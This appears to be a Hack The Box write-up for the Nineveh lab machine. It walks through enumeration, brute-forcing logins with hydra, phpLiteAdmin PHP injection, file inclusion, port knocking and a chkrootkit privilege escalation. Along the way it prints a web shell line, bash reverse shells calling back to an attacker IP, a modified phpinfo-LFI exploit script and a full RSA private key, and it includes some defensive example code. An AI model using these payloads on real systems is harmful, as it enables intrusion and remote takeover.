nmap -sC -sV 10.10.10.43
Starting Nmap 7.91 ( https://nmap.org ) at 2021-12-26 16:22 CST
Nmap scan report for 10.10.10.43
Host is up (0.36s latency).
Not shown: 997 filtered ports
PORT    STATE SERVICE  VERSION
80/tcp  open  http     Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
443/tcp open  ssl/http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: 400 Bad Request
| ssl-cert: Subject: commonName=nineveh.htb/organizationName=HackTheBox Ltd/stateOrProvinceName=Athens/countryName=GR
| Not valid before: 2017-07-01T15:03:30
|_Not valid after:  2018-07-01T15:03:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_  http/1.1
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.66 seconds
Ports 80 and 443 are open. The certificate on 443 exposes a virtual hostname, nineveh.htb.

Port 80 enumeration

Note: starting with this box I decided to switch from dirsearch to gobuster.
gobuster dir -u http://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -t 20
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.43
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/12/26 16:27:29 Starting gobuster in directory enumeration mode
===============================================================
/info.php             (Status: 200) [Size: 83695]
/department           (Status: 301) [Size: 315] [--> http://10.10.10.43/department/]
A few sensitive paths turn up:
- info.php is a phpinfo page
- /department is a login page

Port 443 gets the same gobuster scan (-k to ignore the expired certificate):
gobuster dir -k -u https://10.10.10.43 -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php -t 20
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     https://10.10.10.43
[+] Method:                  GET
[+] Threads:                 20
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Extensions:              php
[+] Timeout:                 10s
===============================================================
2021/12/26 16:35:34 Starting gobuster in directory enumeration mode
===============================================================
/db                   (Status: 301) [Size: 309] [--> https://10.10.10.43/db/]
/server-status        (Status: 403) [Size: 300]
/secure_notes         (Status: 301) [Size: 319] [--> https://10.10.10.43/secure_notes/]

Three sensitive paths here.
Virtual host enumeration

This step comes from 0xdf; I did not think of it myself at all and only noticed it when going through his writeup while tidying up my notes. I still do not understand what --hh does.

root@kali# wfuzz -c -u http://10.10.10.43/ -H "Host: FUZZ.nineveh.htb" -w /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt --hh 178
********************************************************
* Wfuzz 2.4.5 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.43/
Total requests: 100000

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

Total time: 206.0595
Processed Requests: 100000
Filtered Requests: 100000
Requests/sec.: 485.2965

Getting www-data access

Method 1
Port 80

Note the different responses for the two usernames: the login checks the username and the password separately, which means the username can be enumerated on its own.

The username is admin.

Next, try the PHP bug of submitting the password as an array. Edit the request in Burp and change
password=...
to
password[]=
and that is enough.

hydra could also brute-force the password here; it is 1q2w3e4r5t.

Login succeeded.

Trying notes, the only useful page, shows a file include path and database output, so the file inclusion can be tested by changing the path.

One observation: the check only seems to look for the string /ninevehNotes in the path; if it is missing, the page answers "No Note is selected".

Park this for now; we know there is a file inclusion vulnerability here.
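The check described above only tests for the substring /ninevehNotes, so a path that keeps that prefix and then walks out of the directory still passes. The Python below is an added example, not code from this writeup or from the Nineveh box: weak_check() mirrors the substring test as the page describes it, and safe_resolve() shows the check a hardened include would do instead. The base directory /var/www/html/department and the function names are assumptions.

```python
import posixpath
from urllib.parse import unquote

# Assumed layout: the application's directory and the notes folder beneath it.
BASE_DIR = "/var/www/html/department"
NOTES_DIR = BASE_DIR + "/ninevehNotes"


def weak_check(notes: str) -> bool:
    """Model of the check observed on the page: the request is accepted as long as
    the string '/ninevehNotes' appears somewhere in the parameter.  It never looks
    at where the path actually ends up after '..' segments are resolved."""
    return "/ninevehNotes" in notes


def safe_resolve(notes: str):
    """Hardened variant: decode, reject NUL bytes, anchor the request under BASE_DIR,
    normalise it, then require the result to still lie inside NOTES_DIR.
    Returns the resolved path, or None when the request is refused."""
    decoded = unquote(notes)
    if "\x00" in decoded:                      # NUL-byte truncation tricks
        return None
    relative = decoded.lstrip("/")             # '/ninevehNotes/x' -> 'ninevehNotes/x'
    candidate = posixpath.normpath(posixpath.join(BASE_DIR, relative))
    # normpath collapses every '..'; a request that escaped no longer starts with
    # the notes directory, so a prefix test on the *resolved* path is meaningful.
    if not candidate.startswith(NOTES_DIR + "/"):
        return None
    return candidate


def compare(notes: str) -> dict:
    """Run both checks on one request so the difference is visible side by side."""
    return {"weak_accepts": weak_check(notes), "safe_path": safe_resolve(notes)}


if __name__ == "__main__":
    # Constructed sample requests, including the '/ninevehNotes/..' shape the page uses.
    for sample in ["/ninevehNotes/test.txt",
                   "/ninevehNotes/../../../../etc/passwd",
                   "/ninevehNotes/..%2f..%2fetc/passwd",
                   "/etc/passwd"]:
        print(f"{sample:42} {compare(sample)}")
```

The traversal shapes in the sample list are accepted by the substring test and refused by the resolved-path test; a request without the prefix is refused by both, which matches the "No Note is selected" behaviour the page reports.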
Port 443

Look at the db path first. It is a phpLiteAdmin login panel, used to manage databases.

Version 1.9 of this panel has a known vulnerability: the database file's extension can be changed to .php and PHP statements written into a table.

The prerequisite is knowing the password to get into the panel. Brute-forcing in Burp shows it is a weak password; the first time I used a small 100-word dictionary and it did not find it...

hydra can be used to run a wordlist here.
I'll run hydra with the following options:

- -l 0xdf - hydra requires a username, even if it won't use it
- -P [password file] - a file of passwords to try
- https-post-form - this is the plugin to use, which takes a string with three parts, ":" separated:
  - /db/index.php - the path to POST to
  - password=^PASS^&remember=yes&login=Log+In&proc_login=true - the POST data, with ^PASS^ being the thing that will be replaced with words from the wordlist
  - Incorrect password - text on the response that indicates failure to login
It finds the password very quickly:
root@kali# hydra 10.10.10.43 -l 0xdf -P /usr/share/seclists/Passwords/twitter-banned.txt https-post-form "/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password"
Hydra v9.0 (c) 2019 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2020-04-11 06:03:28
[DATA] max 16 tasks per 1 server, overall 16 tasks, 397 login tries (l:1/p:397), ~25 tries per task
[DATA] attacking http-post-forms://10.10.10.43:443/db/index.php:password=^PASS^&remember=yes&login=Log+In&proc_login=true:Incorrect password
[443][http-post-form] host: 10.10.10.43   login: 0xdf   password: password123
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2020-04-11 06:03:36

(from 0xdf)
The password is password123.

Once inside there is a test database; now the vulnerability can be used. The steps are:

1. Create a database whose name ends in .php
2. Create a new table; one field is enough
3. Give the field any name, choose type text, and enter as the default value
system($_REQUEST[cmd]);
Note that this has to be completed into a full PHP statement; I cannot include the tags here because of formatting.

Create it just like that.

The panel's front page shows where this file is created, so it can be reached through the port 80 file inclusion.

Execution succeeds. Now change the parameter to a reverse shell:

bash -c 'bash -i >%26 /dev/tcp/10.10.16.2/4444 0>%261'

with nc listening, and the www-data shell comes back.
Method 1.5

Using the same phpLiteAdmin vulnerability: write the payload locally, fetch it with wget, rename it, and use it directly.

As before, the command goes in the default value field.

Then write a shell.txt locally and serve it with Python's built-in HTTP server:

python3 -m http.server 80

wget -O saves the .txt as a .php file; if it were a .php file from the start, the reverse-shell script would run on the local machine instead.

shell.txt contains:

&3 2>&3"); ?>

Then trigger it via RFI.
Method 2 (I did not manage to reproduce this)

File upload via phpinfo

phpinfo shows the line

file_uploads On On

so the earlier file inclusion can be combined with this file upload to get a shell.

How to upload a file: refresh the phpinfo page to capture a GET request, then turn it into a POST to try an upload:
POST /info.php HTTP/1.1
Host: 10.10.10.43
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
cookie: PHPSESSID=ehjpe8sp040ma068aen884obr7
Upgrade-Insecure-Requests: 1
Content-Length: 194
Content-Type: multipart/form-data; boundary=---------------------------7db268605ae

-----------------------------7db268605ae
Content-Disposition: form-data; name="dummyname"; filename="test.txt"
Content-Type: text/plain

Security Test
-----------------------------7db268605ae
The phpinfo page then shows the details of the uploaded file, including where it was stored, which confirms the upload works.

A python script implements the rest: https://www.insomniasec.com/downloads/publications/phpinfolfi.py
I have put it in the folder of the same name; take it if you need it.

A few things in the script still have to be changed:

1. Change the address in REQ1: POST /phpinfo.php becomes /info.php
2. Change the payload to a reverse shell and set the matching parameters
3. Change the GET request below it to the address of the RFI we found earlier

After the changes it looks like this:
local_ip = "10.10.14.24"
local_port = 443
phpsessid = "ehjpe8sp040ma068aen884obr7"

# set the parameters
def setup(host, port):
    TAG="Security Test"
    PAYLOAD="""%s\r & /dev/tcp/%s/%d 0>&1'");?>\r""" % (TAG, local_ip, local_port)
    REQ1_DATA="""-----------------------------7dbff1ded0714\r
Content-Disposition: form-data; name="dummyname"; filename="test.txt"\r
Content-Type: text/plain\r
\r
%s
-----------------------------7dbff1ded0714--\r""" % PAYLOAD
    padding="A" * 5000
    REQ1="""POST /info.php?a="""+padding+""" HTTP/1.1\r
cookie: PHPSESSID=""" + phpsessid + """; othercookie="""+padding+"""\r
HTTP_ACCEPT: """ + padding + """\r
HTTP_USER_AGENT: """+padding+"""\r
HTTP_ACCEPT_LANGUAGE: """+padding+"""\r
HTTP_PRAGMA: """+padding+"""\r
Content-Type: multipart/form-data; boundary=---------------------------7dbff1ded0714\r
Content-Length: %s\r
Host: %s\r
\r
%s""" %(len(REQ1_DATA),host,REQ1_DATA)
    #modify this to suit the LFI script
    LFIREQ="""GET /department/manage.php?notes=/ninevehNotes/..%s HTTP/1.1\r
User-Agent: Mozilla/4.0\r
Proxy-Connection: Keep-Alive\r
cookie: PHPSESSID=""" + phpsessid + """\r
Host: %s\r
\r
\r
"""
    return (REQ1, TAG, LFIREQ)

Privilege escalation to amrois
Attack surface used so far: db on 443 and everything on 80.

That leaves the secure_notes directory on 443. It holds an image; nobody serves a useless image on a box like this, so download it and check for steganography.
www-data@nineveh:/var/www/ssl/secure_notes$ strings nineveh.png
www-data
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI
H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU
PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5
FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI
3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT
X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn
KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk
FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z
GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR
JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo
9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu
Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb
ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl
1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b
vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx
DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89
P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC
fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i
tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC
iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1
MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh
PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse
i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc
il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7
fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG
-----END RSA PRIVATE KEY-----
secret/nineveh.pub
0000644
0000041
0000041
00000000620
13126060277
014541
ustar
www-data
www-data
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCuL0RQPtvCpuYSwSkh5OvYoY//CTxgBHRniaa8c0ndR+wCGkgf38HPVpsVuu3Xq8fr+N3ybS6uD8Sbt38Umdyk+IgfzUlsnSnJMG8gAY0rs+FpBdQ91P3LTEQQfRqlsmS6Sc/gUflmurSeGgNNrZbFcNxJLWd238zyv55MfHVtXOeUEbkVCrX/CYHrlzxt2zm0ROVpyv/Xk5+/UDaP68h2CDE2CbwDfjFmI/9ZXv7uaGC9ycjeirC/EIj5UaFBmGhX092Pj4PiXTbdRv0rIabjS2KcJd4+wx1jgo4tNH/P6iPixBNf7/X/FyXrUsANxiTRLDjZs5v7IETJzVNOrU0R [email protected]
This is amrois's private key, so SSH is the obvious next step; the catch is that the nmap scan did not show port 22 open.

The knockd port

An email was left in the /var/mail/amrois mailbox:
$ cat /var/mail/amrois
From [email protected]  Fri Jun 23 14:04:19 2017
Return-Path:
X-Original-To: amrois
Delivered-To: [email protected]
Received: by nineveh.htb (Postfix, from userid 1000)
	id D289B2E3587; Fri, 23 Jun 2017 14:04:19 -0500 (CDT)
To: [email protected]
From: [email protected]
Subject: Another important note!
Message-Id: <[email protected]>
Date: Fri, 23 Jun 2017 14:04:19 -0500 (CDT)

Amrois! please knock the door next time! 571 290 911
This points at knock: the port only opens after it has been "knocked" with the right sequence.

ps auxww lists the running processes, and knockd is indeed among them.

First we need the knock sequence, which is in the knockd configuration file:
www-data@nineveh:/var/www/ssl/secure_notes$ cat /etc/knockd.conf
cat /etc/knockd.conf
[options]
	logfile = /var/log/knockd.log
	interface = ens160

[openSSH]
	sequence = 571, 290, 911
	seq_timeout = 5
	start_command = /sbin/iptables -I INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
	tcpflags = syn

[closeSSH]
	sequence = 911,290,571
	seq_timeout = 5
	start_command = /sbin/iptables -D INPUT -s %IP% -p tcp --dport 22 -j ACCEPT
	tcpflags = syn
The sequence is 571 290 911, and the whole sequence has to arrive within seq_timeout (5 seconds); a reversed sequence closes the port again.
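The configuration above is a small state machine: for each source address, knockd waits for SYNs to 571, 290 and 911 in that order, all within seq_timeout seconds, and a SYN to any other port throws the progress away. The Python below is an added example, not code from this writeup or from knockd itself, that models that matching on constructed SYN events using the two rules from the page's /etc/knockd.conf. The class and function names are assumptions; it only records which sources would have port 22 opened and does not touch iptables.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class KnockRule:
    name: str
    sequence: tuple      # destination ports, in the order they must arrive
    seq_timeout: float   # seconds allowed from the first knock to the last


# The two rules from /etc/knockd.conf on the page.
RULES = (
    KnockRule("openSSH", (571, 290, 911), 5.0),
    KnockRule("closeSSH", (911, 290, 571), 5.0),
)


class KnockTracker:
    """Per-source progress through each rule, the way knockd matches knocks."""

    def __init__(self, rules=RULES):
        self.rules = rules
        self.progress = {}        # (src_ip, rule name) -> (next index, first-knock ts)
        self.ssh_allowed = set()  # sources for which openSSH has fired

    def syn(self, src_ip: str, dport: int, ts: float):
        """Feed one TCP SYN (tcpflags = syn). Returns the rule that completed, or None."""
        fired = None
        for rule in self.rules:
            key = (src_ip, rule.name)
            idx, started = self.progress.get(key, (0, None))
            if idx and ts - started > rule.seq_timeout:
                idx, started = 0, None           # sequence took too long: start over
            if dport == rule.sequence[idx]:
                started = ts if idx == 0 else started
                idx += 1
                if idx == len(rule.sequence):    # whole sequence seen, in order and in time
                    fired, idx, started = rule.name, 0, None
            else:
                idx, started = 0, None           # wrong port: progress is discarded
            self.progress[key] = (idx, started)
        if fired == "openSSH":                   # stands in for: iptables -I INPUT ... ACCEPT
            self.ssh_allowed.add(src_ip)
        elif fired == "closeSSH":                # stands in for: iptables -D INPUT ... ACCEPT
            self.ssh_allowed.discard(src_ip)
        return fired

    def ssh_open(self, src_ip: str) -> bool:
        return src_ip in self.ssh_allowed


def replay(events, rules=RULES):
    """Run (src_ip, dport, ts) SYN events; return the rules that fired, and the tracker."""
    tracker = KnockTracker(rules)
    fired = [r for r in (tracker.syn(*e) for e in events) if r is not None]
    return fired, tracker


if __name__ == "__main__":
    # Constructed traces: a correct knock, the same ports too slowly, and out of order.
    src = "10.10.16.2"
    good = [(src, 571, 0.0), (src, 290, 0.4), (src, 911, 0.9)]
    slow = [(src, 571, 0.0), (src, 290, 3.0), (src, 911, 6.0)]
    wrong = [(src, 290, 0.0), (src, 571, 0.5), (src, 911, 1.0)]
    for label, trace in (("in order", good), ("too slow", slow), ("wrong order", wrong)):
        fired, t = replay(trace)
        print(f"{label:12} fired={fired} ssh_open={t.ssh_open(src)}")
```

This is also why the nmap loop later on the page uses --max-retries 0 and a short --host-timeout: each run must send exactly one SYN, and the three runs have to finish inside the 5-second window or the tracker resets.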
Open another shell and knock; there is no output:

┌──(root@Mr)-[~]
└─# knock 10.10.10.43 571 290 911
nmap can be used to knock as well:

nmap -Pn --host-timeout 201 --max-retries 0 -p 571,290,911 10.10.10.4

telnet then confirms whether the port is open:
┌──(root@Mr)-[~]
└─# telnet 10.10.10.43 22
Trying 10.10.10.43...
Connected to 10.10.10.43.
Escape character is '^]'.
SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
quit
Protocol mismatch.
Connection closed by foreign host.
The SSH banner comes back, so the port is open. Now connect with the private key.

Connecting over SSH with the private key

Create a file named id.rsa and paste in the private key that was hidden in the image:
-----BEGIN RSA PRIVATE KEY-----
MIIEowIBAAKCAQEAri9EUD7bwqbmEsEpIeTr2KGP/wk8YAR0Z4mmvHNJ3UfsAhpI
H9/Bz1abFbrt16vH6/jd8m0urg/Em7d/FJncpPiIH81JbJ0pyTBvIAGNK7PhaQXU
PdT9y0xEEH0apbJkuknP4FH5Zrq0nhoDTa2WxXDcSS1ndt/M8r+eTHx1bVznlBG5
FQq1/wmB65c8bds5tETlacr/15Ofv1A2j+vIdggxNgm8A34xZiP/WV7+7mhgvcnI
3oqwvxCI+VGhQZhoV9Pdj4+D4l023Ub9KyGm40tinCXePsMdY4KOLTR/z+oj4sQT
X+/1/xcl61LADcYk0Sw42bOb+yBEyc1TTq1NEQIDAQABAoIBAFvDbvvPgbr0bjTn
KiI/FbjUtKWpWfNDpYd+TybsnbdD0qPw8JpKKTJv79fs2KxMRVCdlV/IAVWV3QAk
FYDm5gTLIfuPDOV5jq/9Ii38Y0DozRGlDoFcmi/mB92f6s/sQYCarjcBOKDUL58z
GRZtIwb1RDgRAXbwxGoGZQDqeHqaHciGFOugKQJmupo5hXOkfMg/G+Ic0Ij45uoR
JZecF3lx0kx0Ay85DcBkoYRiyn+nNgr/APJBXe9Ibkq4j0lj29V5dT/HSoF17VWo
9odiTBWwwzPVv0i/JEGc6sXUD0mXevoQIA9SkZ2OJXO8JoaQcRz628dOdukG6Utu
Bato3bkCgYEA5w2Hfp2Ayol24bDejSDj1Rjk6REn5D8TuELQ0cffPujZ4szXW5Kb
ujOUscFgZf2P+70UnaceCCAPNYmsaSVSCM0KCJQt5klY2DLWNUaCU3OEpREIWkyl
1tXMOZ/T5fV8RQAZrj1BMxl+/UiV0IIbgF07sPqSA/uNXwx2cLCkhucCgYEAwP3b
vCMuW7qAc9K1Amz3+6dfa9bngtMjpr+wb+IP5UKMuh1mwcHWKjFIF8zI8CY0Iakx
DdhOa4x+0MQEtKXtgaADuHh+NGCltTLLckfEAMNGQHfBgWgBRS8EjXJ4e55hFV89
P+6+1FXXA1r/Dt/zIYN3Vtgo28mNNyK7rCr/pUcCgYEAgHMDCp7hRLfbQWkksGzC
fGuUhwWkmb1/ZwauNJHbSIwG5ZFfgGcm8ANQ/Ok2gDzQ2PCrD2Iizf2UtvzMvr+i
tYXXuCE4yzenjrnkYEXMmjw0V9f6PskxwRemq7pxAPzSk0GVBUrEfnYEJSc/MmXC
iEBMuPz0RAaK93ZkOg3Zya0CgYBYbPhdP5FiHhX0+7pMHjmRaKLj+lehLbTMFlB1
MxMtbEymigonBPVn56Ssovv+bMK+GZOMUGu+A2WnqeiuDMjB99s8jpjkztOeLmPh
PNilsNNjfnt/G3RZiq1/Uc+6dFrvO/AIdw+goqQduXfcDOiNlnr7o5c0/Shi9tse
i6UOyQKBgCgvck5Z1iLrY1qO5iZ3uVr4pqXHyG8ThrsTffkSVrBKHTmsXgtRhHoc
il6RYzQV/2ULgUBfAwdZDNtGxbu5oIUB938TCaLsHFDK6mSTbvB/DywYYScAWwF7
fw4LVXdQMjNJC3sn3JaqY1zJkE4jXlZeNQvCx4ZadtdJD9iO+EUG
-----END RSA PRIVATE KEY-----
Mind the format: the file must begin with
-----BEGIN RSA PRIVATE KEY-----
and end with
-----END RSA PRIVATE KEY-----

Finally, set the key file's permissions to 600, or ssh will refuse it:

chmod 600 id.rsa

Then log in over SSH with the key:
┌──(root@Mr)-[~]
└─# ssh -i id.rsa [email protected]
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

288 packages can be updated.
207 updates are security updates.

You have mail.
Last login: Mon Jul  3 00:19:59 2017 from 192.168.0.14

Connected.
Quick method: Knock

This wiki page gives a good example of using nmap to port knock. I'll write it as a one liner:

root@kali# for i in 571 290 911; do
> nmap -Pn --host-timeout 100 --max-retries 0 -p $i 10.10.10.43 >/dev/null
> done; ssh -i ~/keys/id_rsa_nineveh_amrois [email protected]
Ubuntu 16.04.2 LTS
Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)

 * documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

133 packages can be updated.
66 updates are security updates.

You have mail.
Last login: Wed Apr 22 05:34:21 2020 from 10.10.14.24
amrois@nineveh:~$
It loops over the three ports, and for each scans Nineveh with nmap using a short timeout and no retries, directing the output to /dev/null. Then it connects with SSH.
This approach does not seem to need the knock command at all.

Privilege escalation to root

Because we logged in with an SSH key we have no password for sudo, so we cannot list what runs with root rights that way; searching with find for SUID (4000) binaries turned up nothing much either. uname -r shows kernel 4.4.0, which has a usable kernel exploit, but I used that last time, and after finding the vulnerability described below it would feel like cheating.

Out of ideas, I glanced at 0xdf's writeup: he ran that hellish linpeas script and found a report directory that might hold sensitive information. Let's open it:
amrois@nineveh:/report$ cat report-21-12-26:06:40.txt
ROOTDIR is `/'
Checking `amd'... not found
Checking `basename'... not infected
Checking `biff'... not found
Checking `chfn'... not infected
Checking `chsh'... not infected
Checking `cron'... not infected
Checking `crontab'... not infected
Checking `date'... not infected
Checking `du'... not infected
Checking `dirname'... not infected
Checking `echo'... not infected
Checking `egrep'... not infected
Checking `env'... not infected
Checking `find'... not infected
Checking `fingerd'... not found
Checking `gpm'... not found
Checking `grep'... not infected
Checking `hdparm'... not infected
Checking `su'... not infected
Checking `ifconfig'... not infected
Checking `inetd'... not tested
Checking `inetdconf'... not found
Checking `identd'... not found
Checking `init'... not infected
Checking `killall'... not infected
Checking `ldsopreload'... can't exec ./strings-static, not tested
Checking `login'... not infected
Checking `ls'... not infected
Checking `lsof'... not infected
Checking `mail'... not found
Checking `mingetty'... not found
Checking `netstat'... not infected
Checking `named'... not found
Checking `passwd'... not infected
Checking `pidof'... not infected
Checking `pop2'... not found
Checking `pop3'... not found
Checking `ps'... not infected
Checking `pstree'... not infected
Checking `rpcinfo'... not found
Checking `rlogind'... not found
Checking `rshd'... not found
Checking `slogin'... not infected
Checking `sendmail'... not found
Checking `sshd'... not infected
Checking `syslogd'... not tested
Checking `tar'... not infected
Checking `tcpd'... not infected
Checking `tcpdump'... not infected
Checking `top'... not infected
Checking `telnetd'... not found
Checking `timed'... not found
This is obviously a chkrootkit report, so the chkrootkit privilege escalation vulnerability is worth a try. searchsploit shows the details of the exploit.

In short: write a reverse-shell command into /tmp/update, and the next time chkrootkit runs as root it executes that file. This does not even require amrois; www-data is enough.
amrois@nineveh:/tmp$ echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.16.2/4444 0>&1' > update
amrois@nineveh:/tmp$ chmod +x update

Keep the listener running and the shell comes in when the scan fires:
┌──(root@Mr)-[~]
└─# nc -vlnp 4444
listening on [any] 4444 ...
connect to [10.10.16.2] from (UNKNOWN) [10.10.10.43] 36250
bash: cannot set terminal process group (20694): Inappropriate ioctl for device
bash: no job control in this shell
root@nineveh:~#
That's all.

0xdf also mentions using pspy to watch the running processes, which is how the periodic chkrootkit run can be spotted.

Thanks to 0xdf for the ideas on escalating to root and for the material used while tidying up these notes.
Method 1.5 comes from v3ded: HackTheBox - Nineveh writeup (v3ded.github.io)
Sharing is welcome; when reposting, please credit the source: 内存溢出